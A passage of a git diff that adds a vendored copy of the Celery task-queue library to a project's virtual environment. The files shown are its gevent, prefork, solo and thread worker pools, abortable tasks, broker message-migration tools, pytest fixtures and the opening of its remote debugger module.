self._pool_map[pid] + greenlet.kill() + greenlet.wait() + + def _get_info(self): + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'free-threads': self._pool.free(), + 'running-threads': self._pool.running(), + }) + return info + + @staticmethod + def _make_killable_target(target): + def killable_target(*args, **kwargs): + try: + return target(*args, **kwargs) + except GreenletExit: + return (False, None, None) + return killable_target + + def _add_to_pool_map(self, pid, greenlet): + self._pool_map[pid] = greenlet + greenlet.link( + TaskPool._cleanup_after_job_finish, + self._pool_map, + pid + ) + + @staticmethod + def _cleanup_after_job_finish(greenlet, pool_map, pid): + del pool_map[pid] diff --git a/env/Lib/site-packages/celery/concurrency/gevent.py b/env/Lib/site-packages/celery/concurrency/gevent.py new file mode 100644 index 00000000..b0ea7e66 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/gevent.py @@ -0,0 +1,122 @@ +"""Gevent execution pool.""" +from time import monotonic + +from kombu.asynchronous import timer as _timer + +from . import base + +try: + from gevent import Timeout +except ImportError: + Timeout = None + +__all__ = ('TaskPool',) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + + +def apply_timeout(target, args=(), kwargs=None, callback=None, + accept_callback=None, pid=None, timeout=None, + timeout_callback=None, Timeout=Timeout, + apply_target=base.apply_target, **rest): + kwargs = {} if not kwargs else kwargs + try: + with Timeout(timeout): + return apply_target(target, args, kwargs, callback, + accept_callback, pid, + propagate=(Timeout,), **rest) + except Timeout: + return timeout_callback(False, timeout) + + +class Timer(_timer.Timer): + + def __init__(self, *args, **kwargs): + from gevent import Greenlet, GreenletExit + + class _Greenlet(Greenlet): + cancel = Greenlet.kill + + self._Greenlet = _Greenlet + self._GreenletExit = GreenletExit + super().__init__(*args, **kwargs) + self._queue = set() + + def _enter(self, eta, priority, entry, **kwargs): + secs = max(eta - monotonic(), 0) + g = self._Greenlet.spawn_later(secs, entry) + self._queue.add(g) + g.link(self._entry_exit) + g.entry = entry + g.eta = eta + g.priority = priority + g.canceled = False + return g + + def _entry_exit(self, g): + try: + g.kill() + finally: + self._queue.discard(g) + + def clear(self): + queue = self._queue + while queue: + try: + queue.pop().kill() + except KeyError: + pass + + @property + def queue(self): + return self._queue + + +class TaskPool(base.BasePool): + """GEvent Pool.""" + + Timer = Timer + + signal_safe = False + is_green = True + task_join_will_block = False + _pool = None + _quick_put = None + + def __init__(self, *args, **kwargs): + from gevent import spawn_raw + from gevent.pool import Pool + self.Pool = Pool + self.spawn_n = spawn_raw + self.timeout = kwargs.get('timeout') + super().__init__(*args, **kwargs) + + def on_start(self): + self._pool = self.Pool(self.limit) + self._quick_put = self._pool.spawn + + def on_stop(self): + if self._pool is not None: + self._pool.join() + + def on_apply(self, target, args=None, kwargs=None, callback=None, + accept_callback=None, timeout=None, + timeout_callback=None, apply_target=base.apply_target, **_): + timeout = self.timeout if timeout is None else timeout + return self._quick_put(apply_timeout if timeout else apply_target, + target, args, kwargs, callback, accept_callback, + timeout=timeout, + timeout_callback=timeout_callback) + + def grow(self, n=1): + self._pool._semaphore.counter += n + self._pool.size += n + + def shrink(self, n=1): + self._pool._semaphore.counter -= n + self._pool.size -= n + + @property + def num_processes(self): + return len(self._pool) diff --git a/env/Lib/site-packages/celery/concurrency/prefork.py b/env/Lib/site-packages/celery/concurrency/prefork.py new file mode 100644 index 00000000..b163328d --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/prefork.py @@ -0,0 +1,172 @@ +"""Prefork execution pool. + +Pool implementation using :mod:`multiprocessing`. +""" +import os + +from billiard import forking_enable +from billiard.common import REMAP_SIGTERM, TERM_SIGNAME +from billiard.pool import CLOSE, RUN +from billiard.pool import Pool as BlockingPool + +from celery import platforms, signals +from celery._state import _set_task_join_will_block, set_default_app +from celery.app import trace +from celery.concurrency.base import BasePool +from celery.utils.functional import noop +from celery.utils.log import get_logger + +from .asynpool import AsynPool + +__all__ = ('TaskPool', 'process_initializer', 'process_destructor') + +#: List of signals to reset when a child process starts. +WORKER_SIGRESET = { + 'SIGTERM', 'SIGHUP', 'SIGTTIN', 'SIGTTOU', 'SIGUSR1', +} + +#: List of signals to ignore when a child process starts. +if REMAP_SIGTERM: + WORKER_SIGIGNORE = {'SIGINT', TERM_SIGNAME} +else: + WORKER_SIGIGNORE = {'SIGINT'} + +logger = get_logger(__name__) +warning, debug = logger.warning, logger.debug + + +def process_initializer(app, hostname): + """Pool child process initializer. + + Initialize the child pool process to ensure the correct + app instance is used and things like logging works. + """ + # Each running worker gets SIGKILL by OS when main process exits. + platforms.set_pdeathsig('SIGKILL') + _set_task_join_will_block(True) + platforms.signals.reset(*WORKER_SIGRESET) + platforms.signals.ignore(*WORKER_SIGIGNORE) + platforms.set_mp_process_title('celeryd', hostname=hostname) + # This is for Windows and other platforms not supporting + # fork(). Note that init_worker makes sure it's only + # run once per process. + app.loader.init_worker() + app.loader.init_worker_process() + logfile = os.environ.get('CELERY_LOG_FILE') or None + if logfile and '%i' in logfile.lower(): + # logfile path will differ so need to set up logging again. + app.log.already_setup = False + app.log.setup(int(os.environ.get('CELERY_LOG_LEVEL', 0) or 0), + logfile, + bool(os.environ.get('CELERY_LOG_REDIRECT', False)), + str(os.environ.get('CELERY_LOG_REDIRECT_LEVEL')), + hostname=hostname) + if os.environ.get('FORKED_BY_MULTIPROCESSING'): + # pool did execv after fork + trace.setup_worker_optimizations(app, hostname) + else: + app.set_current() + set_default_app(app) + app.finalize() + trace._tasks = app._tasks # enables fast_trace_task optimization. + # rebuild execution handler for all tasks. + from celery.app.trace import build_tracer + for name, task in app.tasks.items(): + task.__trace__ = build_tracer(name, task, app.loader, hostname, + app=app) + from celery.worker import state as worker_state + worker_state.reset_state() + signals.worker_process_init.send(sender=None) + + +def process_destructor(pid, exitcode): + """Pool child process destructor. + + Dispatch the :signal:`worker_process_shutdown` signal. + """ + signals.worker_process_shutdown.send( + sender=None, pid=pid, exitcode=exitcode, + ) + + +class TaskPool(BasePool): + """Multiprocessing Pool implementation.""" + + Pool = AsynPool + BlockingPool = BlockingPool + + uses_semaphore = True + write_stats = None + + def on_start(self): + forking_enable(self.forking_enable) + Pool = (self.BlockingPool if self.options.get('threads', True) + else self.Pool) + proc_alive_timeout = ( + self.app.conf.worker_proc_alive_timeout if self.app + else None + ) + P = self._pool = Pool(processes=self.limit, + initializer=process_initializer, + on_process_exit=process_destructor, + enable_timeouts=True, + synack=False, + proc_alive_timeout=proc_alive_timeout, + **self.options) + + # Create proxy methods + self.on_apply = P.apply_async + self.maintain_pool = P.maintain_pool + self.terminate_job = P.terminate_job + self.grow = P.grow + self.shrink = P.shrink + self.flush = getattr(P, 'flush', None) # FIXME add to billiard + + def restart(self): + self._pool.restart() + self._pool.apply_async(noop) + + def did_start_ok(self): + return self._pool.did_start_ok() + + def register_with_event_loop(self, loop): + try: + reg = self._pool.register_with_event_loop + except AttributeError: + return + return reg(loop) + + def on_stop(self): + """Gracefully stop the pool.""" + if self._pool is not None and self._pool._state in (RUN, CLOSE): + self._pool.close() + self._pool.join() + self._pool = None + + def on_terminate(self): + """Force terminate the pool.""" + if self._pool is not None: + self._pool.terminate() + self._pool = None + + def on_close(self): + if self._pool is not None and self._pool._state == RUN: + self._pool.close() + + def _get_info(self): + write_stats = getattr(self._pool, 'human_write_stats', None) + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'processes': [p.pid for p in self._pool._pool], + 'max-tasks-per-child': self._pool._maxtasksperchild or 'N/A', + 'put-guarded-by-semaphore': self.putlocks, + 'timeouts': (self._pool.soft_timeout or 0, + self._pool.timeout or 0), + 'writes': write_stats() if write_stats is not None else 'N/A', + }) + return info + + @property + def num_processes(self): + return self._pool._processes diff --git a/env/Lib/site-packages/celery/concurrency/solo.py b/env/Lib/site-packages/celery/concurrency/solo.py new file mode 100644 index 00000000..e7e9c7f3 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/solo.py @@ -0,0 +1,31 @@ +"""Single-threaded execution pool.""" +import os + +from celery import signals + +from .base import BasePool, apply_target + +__all__ = ('TaskPool',) + + +class TaskPool(BasePool): + """Solo task pool (blocking, inline, fast).""" + + body_can_be_buffer = True + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.on_apply = apply_target + self.limit = 1 + signals.worker_process_init.send(sender=None) + + def _get_info(self): + info = super()._get_info() + info.update({ + 'max-concurrency': 1, + 'processes': [os.getpid()], + 'max-tasks-per-child': None, + 'put-guarded-by-semaphore': True, + 'timeouts': (), + }) + return info diff --git a/env/Lib/site-packages/celery/concurrency/thread.py b/env/Lib/site-packages/celery/concurrency/thread.py new file mode 100644 index 00000000..bcc7c116 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/thread.py @@ -0,0 +1,64 @@ +"""Thread execution pool.""" +from __future__ import annotations + +from concurrent.futures import Future, ThreadPoolExecutor, wait +from typing import TYPE_CHECKING, Any, Callable + +from .base import BasePool, apply_target + +__all__ = ('TaskPool',) + +if TYPE_CHECKING: + from typing import TypedDict + + PoolInfo = TypedDict('PoolInfo', {'max-concurrency': int, 'threads': int}) + + # `TargetFunction` should be a Protocol that represents fast_trace_task and + # trace_task_ret. + TargetFunction = Callable[..., Any] + + +class ApplyResult: + def __init__(self, future: Future) -> None: + self.f = future + self.get = self.f.result + + def wait(self, timeout: float | None = None) -> None: + wait([self.f], timeout) + + +class TaskPool(BasePool): + """Thread Task Pool.""" + limit: int + + body_can_be_buffer = True + signal_safe = False + + def __init__(self, *args: Any, **kwargs: Any) -> None: + super().__init__(*args, **kwargs) + self.executor = ThreadPoolExecutor(max_workers=self.limit) + + def on_stop(self) -> None: + self.executor.shutdown() + super().on_stop() + + def on_apply( + self, + target: TargetFunction, + args: tuple[Any, ...] | None = None, + kwargs: dict[str, Any] | None = None, + callback: Callable[..., Any] | None = None, + accept_callback: Callable[..., Any] | None = None, + **_: Any + ) -> ApplyResult: + f = self.executor.submit(apply_target, target, args, kwargs, + callback, accept_callback) + return ApplyResult(f) + + def _get_info(self) -> PoolInfo: + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'threads': len(self.executor._threads) + }) + return info diff --git a/env/Lib/site-packages/celery/contrib/__init__.py b/env/Lib/site-packages/celery/contrib/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/contrib/abortable.py b/env/Lib/site-packages/celery/contrib/abortable.py new file mode 100644 index 00000000..8cb164d7 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/abortable.py @@ -0,0 +1,165 @@ +"""Abortable Tasks. + +Abortable tasks overview +========================= + +For long-running :class:`Task`'s, it can be desirable to support +aborting during execution. Of course, these tasks should be built to +support abortion specifically. + +The :class:`AbortableTask` serves as a base class for all :class:`Task` +objects that should support abortion by producers. + +* Producers may invoke the :meth:`abort` method on + :class:`AbortableAsyncResult` instances, to request abortion. + +* Consumers (workers) should periodically check (and honor!) the + :meth:`is_aborted` method at controlled points in their task's + :meth:`run` method. The more often, the better. + +The necessary intermediate communication is dealt with by the +:class:`AbortableTask` implementation. + +Usage example +------------- + +In the consumer: + +.. code-block:: python + + from celery.contrib.abortable import AbortableTask + from celery.utils.log import get_task_logger + + from proj.celery import app + + logger = get_logger(__name__) + + @app.task(bind=True, base=AbortableTask) + def long_running_task(self): + results = [] + for i in range(100): + # check after every 5 iterations... + # (or alternatively, check when some timer is due) + if not i % 5: + if self.is_aborted(): + # respect aborted state, and terminate gracefully. + logger.warning('Task aborted') + return + value = do_something_expensive(i) + results.append(y) + logger.info('Task complete') + return results + +In the producer: + +.. code-block:: python + + import time + + from proj.tasks import MyLongRunningTask + + def myview(request): + # result is of type AbortableAsyncResult + result = long_running_task.delay() + + # abort the task after 10 seconds + time.sleep(10) + result.abort() + +After the `result.abort()` call, the task execution isn't +aborted immediately. In fact, it's not guaranteed to abort at all. +Keep checking `result.state` status, or call `result.get(timeout=)` to +have it block until the task is finished. + +.. note:: + + In order to abort tasks, there needs to be communication between the + producer and the consumer. This is currently implemented through the + database backend. Therefore, this class will only work with the + database backends. +""" +from celery import Task +from celery.result import AsyncResult + +__all__ = ('AbortableAsyncResult', 'AbortableTask') + + +""" +Task States +----------- + +.. state:: ABORTED + +ABORTED +~~~~~~~ + +Task is aborted (typically by the producer) and should be +aborted as soon as possible. + +""" +ABORTED = 'ABORTED' + + +class AbortableAsyncResult(AsyncResult): + """Represents an abortable result. + + Specifically, this gives the `AsyncResult` a :meth:`abort()` method, + that sets the state of the underlying Task to `'ABORTED'`. + """ + + def is_aborted(self): + """Return :const:`True` if the task is (being) aborted.""" + return self.state == ABORTED + + def abort(self): + """Set the state of the task to :const:`ABORTED`. + + Abortable tasks monitor their state at regular intervals and + terminate execution if so. + + Warning: + Be aware that invoking this method does not guarantee when the + task will be aborted (or even if the task will be aborted at all). + """ + # TODO: store_result requires all four arguments to be set, + # but only state should be updated here + return self.backend.store_result(self.id, result=None, + state=ABORTED, traceback=None) + + +class AbortableTask(Task): + """Task that can be aborted. + + This serves as a base class for all :class:`Task`'s + that support aborting during execution. + + All subclasses of :class:`AbortableTask` must call the + :meth:`is_aborted` method periodically and act accordingly when + the call evaluates to :const:`True`. + """ + + abstract = True + + def AsyncResult(self, task_id): + """Return the accompanying AbortableAsyncResult instance.""" + return AbortableAsyncResult(task_id, backend=self.backend) + + def is_aborted(self, **kwargs): + """Return true if task is aborted. + + Checks against the backend whether this + :class:`AbortableAsyncResult` is :const:`ABORTED`. + + Always return :const:`False` in case the `task_id` parameter + refers to a regular (non-abortable) :class:`Task`. + + Be aware that invoking this method will cause a hit in the + backend (for example a database query), so find a good balance + between calling it regularly (for responsiveness), but not too + often (for performance). + """ + task_id = kwargs.get('task_id', self.request.id) + result = self.AsyncResult(task_id) + if not isinstance(result, AbortableAsyncResult): + return False + return result.is_aborted() diff --git a/env/Lib/site-packages/celery/contrib/migrate.py b/env/Lib/site-packages/celery/contrib/migrate.py new file mode 100644 index 00000000..dd778017 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/migrate.py @@ -0,0 +1,416 @@ +"""Message migration tools (Broker <-> Broker).""" +import socket +from functools import partial +from itertools import cycle, islice + +from kombu import Queue, eventloop +from kombu.common import maybe_declare +from kombu.utils.encoding import ensure_bytes + +from celery.app import app_or_default +from celery.utils.nodenames import worker_direct +from celery.utils.text import str_to_list + +__all__ = ( + 'StopFiltering', 'State', 'republish', 'migrate_task', + 'migrate_tasks', 'move', 'task_id_eq', 'task_id_in', + 'start_filter', 'move_task_by_id', 'move_by_idmap', + 'move_by_taskmap', 'move_direct', 'move_direct_by_id', +) + +MOVING_PROGRESS_FMT = """\ +Moving task {state.filtered}/{state.strtotal}: \ +{body[task]}[{body[id]}]\ +""" + + +class StopFiltering(Exception): + """Semi-predicate used to signal filter stop.""" + + +class State: + """Migration progress state.""" + + count = 0 + filtered = 0 + total_apx = 0 + + @property + def strtotal(self): + if not self.total_apx: + return '?' + return str(self.total_apx) + + def __repr__(self): + if self.filtered: + return f'^{self.filtered}' + return f'{self.count}/{self.strtotal}' + + +def republish(producer, message, exchange=None, routing_key=None, + remove_props=None): + """Republish message.""" + if not remove_props: + remove_props = ['application_headers', 'content_type', + 'content_encoding', 'headers'] + body = ensure_bytes(message.body) # use raw message body. + info, headers, props = (message.delivery_info, + message.headers, message.properties) + exchange = info['exchange'] if exchange is None else exchange + routing_key = info['routing_key'] if routing_key is None else routing_key + ctype, enc = message.content_type, message.content_encoding + # remove compression header, as this will be inserted again + # when the message is recompressed. + compression = headers.pop('compression', None) + + expiration = props.pop('expiration', None) + # ensure expiration is a float + expiration = float(expiration) if expiration is not None else None + + for key in remove_props: + props.pop(key, None) + + producer.publish(ensure_bytes(body), exchange=exchange, + routing_key=routing_key, compression=compression, + headers=headers, content_type=ctype, + content_encoding=enc, expiration=expiration, + **props) + + +def migrate_task(producer, body_, message, queues=None): + """Migrate single task message.""" + info = message.delivery_info + queues = {} if queues is None else queues + republish(producer, message, + exchange=queues.get(info['exchange']), + routing_key=queues.get(info['routing_key'])) + + +def filter_callback(callback, tasks): + + def filtered(body, message): + if tasks and body['task'] not in tasks: + return + + return callback(body, message) + return filtered + + +def migrate_tasks(source, dest, migrate=migrate_task, app=None, + queues=None, **kwargs): + """Migrate tasks from one broker to another.""" + app = app_or_default(app) + queues = prepare_queues(queues) + producer = app.amqp.Producer(dest, auto_declare=False) + migrate = partial(migrate, producer, queues=queues) + + def on_declare_queue(queue): + new_queue = queue(producer.channel) + new_queue.name = queues.get(queue.name, queue.name) + if new_queue.routing_key == queue.name: + new_queue.routing_key = queues.get(queue.name, + new_queue.routing_key) + if new_queue.exchange.name == queue.name: + new_queue.exchange.name = queues.get(queue.name, queue.name) + new_queue.declare() + + return start_filter(app, source, migrate, queues=queues, + on_declare_queue=on_declare_queue, **kwargs) + + +def _maybe_queue(app, q): + if isinstance(q, str): + return app.amqp.queues[q] + return q + + +def move(predicate, connection=None, exchange=None, routing_key=None, + source=None, app=None, callback=None, limit=None, transform=None, + **kwargs): + """Find tasks by filtering them and move the tasks to a new queue. + + Arguments: + predicate (Callable): Filter function used to decide the messages + to move. Must accept the standard signature of ``(body, message)`` + used by Kombu consumer callbacks. If the predicate wants the + message to be moved it must return either: + + 1) a tuple of ``(exchange, routing_key)``, or + + 2) a :class:`~kombu.entity.Queue` instance, or + + 3) any other true value means the specified + ``exchange`` and ``routing_key`` arguments will be used. + connection (kombu.Connection): Custom connection to use. + source: List[Union[str, kombu.Queue]]: Optional list of source + queues to use instead of the default (queues + in :setting:`task_queues`). This list can also contain + :class:`~kombu.entity.Queue` instances. + exchange (str, kombu.Exchange): Default destination exchange. + routing_key (str): Default destination routing key. + limit (int): Limit number of messages to filter. + callback (Callable): Callback called after message moved, + with signature ``(state, body, message)``. + transform (Callable): Optional function to transform the return + value (destination) of the filter function. + + Also supports the same keyword arguments as :func:`start_filter`. + + To demonstrate, the :func:`move_task_by_id` operation can be implemented + like this: + + .. code-block:: python + + def is_wanted_task(body, message): + if body['id'] == wanted_id: + return Queue('foo', exchange=Exchange('foo'), + routing_key='foo') + + move(is_wanted_task) + + or with a transform: + + .. code-block:: python + + def transform(value): + if isinstance(value, str): + return Queue(value, Exchange(value), value) + return value + + move(is_wanted_task, transform=transform) + + Note: + The predicate may also return a tuple of ``(exchange, routing_key)`` + to specify the destination to where the task should be moved, + or a :class:`~kombu.entity.Queue` instance. + Any other true value means that the task will be moved to the + default exchange/routing_key. + """ + app = app_or_default(app) + queues = [_maybe_queue(app, queue) for queue in source or []] or None + with app.connection_or_acquire(connection, pool=False) as conn: + producer = app.amqp.Producer(conn) + state = State() + + def on_task(body, message): + ret = predicate(body, message) + if ret: + if transform: + ret = transform(ret) + if isinstance(ret, Queue): + maybe_declare(ret, conn.default_channel) + ex, rk = ret.exchange.name, ret.routing_key + else: + ex, rk = expand_dest(ret, exchange, routing_key) + republish(producer, message, + exchange=ex, routing_key=rk) + message.ack() + + state.filtered += 1 + if callback: + callback(state, body, message) + if limit and state.filtered >= limit: + raise StopFiltering() + + return start_filter(app, conn, on_task, consume_from=queues, **kwargs) + + +def expand_dest(ret, exchange, routing_key): + try: + ex, rk = ret + except (TypeError, ValueError): + ex, rk = exchange, routing_key + return ex, rk + + +def task_id_eq(task_id, body, message): + """Return true if task id equals task_id'.""" + return body['id'] == task_id + + +def task_id_in(ids, body, message): + """Return true if task id is member of set ids'.""" + return body['id'] in ids + + +def prepare_queues(queues): + if isinstance(queues, str): + queues = queues.split(',') + if isinstance(queues, list): + queues = dict(tuple(islice(cycle(q.split(':')), None, 2)) + for q in queues) + if queues is None: + queues = {} + return queues + + +class Filterer: + + def __init__(self, app, conn, filter, + limit=None, timeout=1.0, + ack_messages=False, tasks=None, queues=None, + callback=None, forever=False, on_declare_queue=None, + consume_from=None, state=None, accept=None, **kwargs): + self.app = app + self.conn = conn + self.filter = filter + self.limit = limit + self.timeout = timeout + self.ack_messages = ack_messages + self.tasks = set(str_to_list(tasks) or []) + self.queues = prepare_queues(queues) + self.callback = callback + self.forever = forever + self.on_declare_queue = on_declare_queue + self.consume_from = [ + _maybe_queue(self.app, q) + for q in consume_from or list(self.queues) + ] + self.state = state or State() + self.accept = accept + + def start(self): + # start migrating messages. + with self.prepare_consumer(self.create_consumer()): + try: + for _ in eventloop(self.conn, # pragma: no cover + timeout=self.timeout, + ignore_timeouts=self.forever): + pass + except socket.timeout: + pass + except StopFiltering: + pass + return self.state + + def update_state(self, body, message): + self.state.count += 1 + if self.limit and self.state.count >= self.limit: + raise StopFiltering() + + def ack_message(self, body, message): + message.ack() + + def create_consumer(self): + return self.app.amqp.TaskConsumer( + self.conn, + queues=self.consume_from, + accept=self.accept, + ) + + def prepare_consumer(self, consumer): + filter = self.filter + update_state = self.update_state + ack_message = self.ack_message + if self.tasks: + filter = filter_callback(filter, self.tasks) + update_state = filter_callback(update_state, self.tasks) + ack_message = filter_callback(ack_message, self.tasks) + consumer.register_callback(filter) + consumer.register_callback(update_state) + if self.ack_messages: + consumer.register_callback(self.ack_message) + if self.callback is not None: + callback = partial(self.callback, self.state) + if self.tasks: + callback = filter_callback(callback, self.tasks) + consumer.register_callback(callback) + self.declare_queues(consumer) + return consumer + + def declare_queues(self, consumer): + # declare all queues on the new broker. + for queue in consumer.queues: + if self.queues and queue.name not in self.queues: + continue + if self.on_declare_queue is not None: + self.on_declare_queue(queue) + try: + _, mcount, _ = queue( + consumer.channel).queue_declare(passive=True) + if mcount: + self.state.total_apx += mcount + except self.conn.channel_errors: + pass + + +def start_filter(app, conn, filter, limit=None, timeout=1.0, + ack_messages=False, tasks=None, queues=None, + callback=None, forever=False, on_declare_queue=None, + consume_from=None, state=None, accept=None, **kwargs): + """Filter tasks.""" + return Filterer( + app, conn, filter, + limit=limit, + timeout=timeout, + ack_messages=ack_messages, + tasks=tasks, + queues=queues, + callback=callback, + forever=forever, + on_declare_queue=on_declare_queue, + consume_from=consume_from, + state=state, + accept=accept, + **kwargs).start() + + +def move_task_by_id(task_id, dest, **kwargs): + """Find a task by id and move it to another queue. + + Arguments: + task_id (str): Id of task to find and move. + dest: (str, kombu.Queue): Destination queue. + transform (Callable): Optional function to transform the return + value (destination) of the filter function. + **kwargs (Any): Also supports the same keyword + arguments as :func:`move`. + """ + return move_by_idmap({task_id: dest}, **kwargs) + + +def move_by_idmap(map, **kwargs): + """Move tasks by matching from a ``task_id: queue`` mapping. + + Where ``queue`` is a queue to move the task to. + + Example: + >>> move_by_idmap({ + ... '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'), + ... 'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'), + ... '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')}, + ... queues=['hipri']) + """ + def task_id_in_map(body, message): + return map.get(message.properties['correlation_id']) + + # adding the limit means that we don't have to consume any more + # when we've found everything. + return move(task_id_in_map, limit=len(map), **kwargs) + + +def move_by_taskmap(map, **kwargs): + """Move tasks by matching from a ``task_name: queue`` mapping. + + ``queue`` is the queue to move the task to. + + Example: + >>> move_by_taskmap({ + ... 'tasks.add': Queue('name'), + ... 'tasks.mul': Queue('name'), + ... }) + """ + def task_name_in_map(body, message): + return map.get(body['task']) # <- name of task + + return move(task_name_in_map, **kwargs) + + +def filter_status(state, body, message, **kwargs): + print(MOVING_PROGRESS_FMT.format(state=state, body=body, **kwargs)) + + +move_direct = partial(move, transform=worker_direct) +move_direct_by_id = partial(move_task_by_id, transform=worker_direct) +move_direct_by_idmap = partial(move_by_idmap, transform=worker_direct) +move_direct_by_taskmap = partial(move_by_taskmap, transform=worker_direct) diff --git a/env/Lib/site-packages/celery/contrib/pytest.py b/env/Lib/site-packages/celery/contrib/pytest.py new file mode 100644 index 00000000..d1f8279f --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/pytest.py @@ -0,0 +1,216 @@ +"""Fixtures and testing utilities for :pypi:`pytest `.""" +import os +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union # noqa + +import pytest + +if TYPE_CHECKING: + from celery import Celery + + from ..worker import WorkController +else: + Celery = WorkController = object + + +NO_WORKER = os.environ.get('NO_WORKER') + +# pylint: disable=redefined-outer-name +# Well, they're called fixtures.... + + +def pytest_configure(config): + """Register additional pytest configuration.""" + # add the pytest.mark.celery() marker registration to the pytest.ini [markers] section + # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker + # and shows helpful marker documentation when running pytest --markers. + config.addinivalue_line( + "markers", "celery(**overrides): override celery configuration for a test case" + ) + + +@contextmanager +def _create_app(enable_logging=False, + use_trap=False, + parameters=None, + **config): + # type: (Any, Any, Any, **Any) -> Celery + """Utility context used to setup Celery app for pytest fixtures.""" + + from .testing.app import TestApp, setup_default_app + + parameters = {} if not parameters else parameters + test_app = TestApp( + set_as_current=False, + enable_logging=enable_logging, + config=config, + **parameters + ) + with setup_default_app(test_app, use_trap=use_trap): + yield test_app + + +@pytest.fixture(scope='session') +def use_celery_app_trap(): + # type: () -> bool + """You can override this fixture to enable the app trap. + + The app trap raises an exception whenever something attempts + to use the current or default apps. + """ + return False + + +@pytest.fixture(scope='session') +def celery_session_app(request, + celery_config, + celery_parameters, + celery_enable_logging, + use_celery_app_trap): + # type: (Any, Any, Any, Any, Any) -> Celery + """Session Fixture: Return app for session fixtures.""" + mark = request.node.get_closest_marker('celery') + config = dict(celery_config, **mark.kwargs if mark else {}) + with _create_app(enable_logging=celery_enable_logging, + use_trap=use_celery_app_trap, + parameters=celery_parameters, + **config) as app: + if not use_celery_app_trap: + app.set_default() + app.set_current() + yield app + + +@pytest.fixture(scope='session') +def celery_session_worker( + request, # type: Any + celery_session_app, # type: Celery + celery_includes, # type: Sequence[str] + celery_class_tasks, # type: str + celery_worker_pool, # type: Any + celery_worker_parameters, # type: Mapping[str, Any] +): + # type: (...) -> WorkController + """Session Fixture: Start worker that lives throughout test suite.""" + from .testing import worker + + if not NO_WORKER: + for module in celery_includes: + celery_session_app.loader.import_task_module(module) + for class_task in celery_class_tasks: + celery_session_app.register_task(class_task) + with worker.start_worker(celery_session_app, + pool=celery_worker_pool, + **celery_worker_parameters) as w: + yield w + + +@pytest.fixture(scope='session') +def celery_enable_logging(): + # type: () -> bool + """You can override this fixture to enable logging.""" + return False + + +@pytest.fixture(scope='session') +def celery_includes(): + # type: () -> Sequence[str] + """You can override this include modules when a worker start. + + You can have this return a list of module names to import, + these can be task modules, modules registering signals, and so on. + """ + return () + + +@pytest.fixture(scope='session') +def celery_worker_pool(): + # type: () -> Union[str, Any] + """You can override this fixture to set the worker pool. + + The "solo" pool is used by default, but you can set this to + return e.g. "prefork". + """ + return 'solo' + + +@pytest.fixture(scope='session') +def celery_config(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to configure the test Celery app. + + The config returned by your fixture will then be used + to configure the :func:`celery_app` fixture. + """ + return {} + + +@pytest.fixture(scope='session') +def celery_parameters(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to change the init parameters of test Celery app. + + The dict returned by your fixture will then be used + as parameters when instantiating :class:`~celery.Celery`. + """ + return {} + + +@pytest.fixture(scope='session') +def celery_worker_parameters(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to change the init parameters of Celery workers. + + This can be used e. g. to define queues the worker will consume tasks from. + + The dict returned by your fixture will then be used + as parameters when instantiating :class:`~celery.worker.WorkController`. + """ + return {} + + +@pytest.fixture() +def celery_app(request, + celery_config, + celery_parameters, + celery_enable_logging, + use_celery_app_trap): + """Fixture creating a Celery application instance.""" + mark = request.node.get_closest_marker('celery') + config = dict(celery_config, **mark.kwargs if mark else {}) + with _create_app(enable_logging=celery_enable_logging, + use_trap=use_celery_app_trap, + parameters=celery_parameters, + **config) as app: + yield app + + +@pytest.fixture(scope='session') +def celery_class_tasks(): + """Redefine this fixture to register tasks with the test Celery app.""" + return [] + + +@pytest.fixture() +def celery_worker(request, + celery_app, + celery_includes, + celery_worker_pool, + celery_worker_parameters): + # type: (Any, Celery, Sequence[str], str, Any) -> WorkController + """Fixture: Start worker in a thread, stop it when the test returns.""" + from .testing import worker + + if not NO_WORKER: + for module in celery_includes: + celery_app.loader.import_task_module(module) + with worker.start_worker(celery_app, + pool=celery_worker_pool, + **celery_worker_parameters) as w: + yield w + + +@pytest.fixture() +def depends_on_current_app(celery_app): + """Fixture that sets app as current.""" + celery_app.set_current() diff --git a/env/Lib/site-packages/celery/contrib/rdb.py b/env/Lib/site-packages/celery/contrib/rdb.py new file mode 100644 index 00000000..8ac8f701 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/rdb.py @@ -0,0 +1,187 @@ +"""Remote Debugger. + +Introduction +============ + +This is a remote debugger for Celery tasks running in multiprocessing +pool workers. Inspired by a lost post on dzone.com. + +Usage +----- + +.. code-block:: python + + from celery.contrib import rdb + from celery import task + + @task() + def add(x, y): + result = x + y + rdb.set_trace() + return result + +Environment Variables +===================== + +.. envvar:: CELERY_RDB_HOST + +``CELERY_RDB_HOST`` +------------------- + + Hostname to bind to. Default is '127.0.0.1' (only accessible from + localhost). + +.. envvar:: CELERY_RDB_PORT + +``CELERY_RDB_PORT`` +------------------- + + Base port to bind to. Default is 6899. + The debugger will try to find an available port starting from the + base port. The selected port will be logged by the worker. +""" +import errno +import os +import socket +import sys +from pdb import Pdb + +from billiard.process import current_process + +__all__ = ( + 'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT', + 'Rdb', 'debugger', 'set_trace', +) + +DEFAULT_PORT = 6899 + +CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1' +CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT) + +#: 